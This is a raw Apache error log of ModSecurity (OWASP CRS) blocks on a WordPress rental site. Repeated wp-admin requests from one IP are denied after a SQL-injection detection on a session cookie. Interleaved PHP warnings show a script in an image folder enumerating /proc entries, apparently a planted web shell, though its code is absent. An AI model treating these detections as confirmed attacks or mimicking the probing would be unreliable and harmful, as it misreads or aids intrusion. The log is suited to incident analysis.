[Mon May 11 22:20:42.645759 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6GqFW67LJTsgN3jQKagAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:43.062881 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6GqFW67LJTsgN3jQKagAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:43.646231 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6G6FW67LJTsgN3jQKbAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:43.646533 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6G6FW67LJTsgN3jQKbAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:44.296508 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6G6FW67LJTsgN3jQKbAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:45.134596 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6HaFW67LJTsgN3jQKbgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:45.134879 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6HaFW67LJTsgN3jQKbgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:45.750655 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6HaFW67LJTsgN3jQKbgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:46.138581 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6HqFW67LJTsgN3jQKcAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:46.138888 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6HqFW67LJTsgN3jQKcAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:46.758918 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6HqFW67LJTsgN3jQKcAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:47.144582 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6H6FW67LJTsgN3jQKcgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:47.144871 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6H6FW67LJTsgN3jQKcgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:47.700126 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6H6FW67LJTsgN3jQKcgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:48.122742 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6IKFW67LJTsgN3jQKcwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:48.123060 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6IKFW67LJTsgN3jQKcwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:49.329896 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6IKFW67LJTsgN3jQKcwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:49.851001 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6IaFW67LJTsgN3jQKdQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:49.851298 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6IaFW67LJTsgN3jQKdQAAAAg"], referer: https://rentparadise.fr/wp-login.php
PHP Warning:  filesize(): stat failed for /proc/1724/task/1724/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1724/task/1724/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1724/task/1724/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1724/task/1724/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1724/task/1724/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1724/task/1724/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:20:50.231287 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6IaFW67LJTsgN3jQKdQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:51.023063 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6I6FW67LJTsgN3jQKdgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:51.023506 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6I6FW67LJTsgN3jQKdgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:51.666522 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6I6FW67LJTsgN3jQKdgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:52.427504 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6JKFW67LJTsgN3jQKeAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:52.427785 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6JKFW67LJTsgN3jQKeAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:53.799745 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6JKFW67LJTsgN3jQKeAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:54.142993 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6JqFW67LJTsgN3jQKegAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:54.143308 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6JqFW67LJTsgN3jQKegAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:54.771708 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6JqFW67LJTsgN3jQKegAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:55.749871 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6J6FW67LJTsgN3jQKfAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:55.750186 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6J6FW67LJTsgN3jQKfAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:56.361693 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6J6FW67LJTsgN3jQKfAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:56.560408 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6KKFW67LJTsgN3jQKgAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:56.560697 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6KKFW67LJTsgN3jQKgAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:57.242290 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6KKFW67LJTsgN3jQKgAAAAAg"], referer: https://rentparadise.fr/wp-login.php
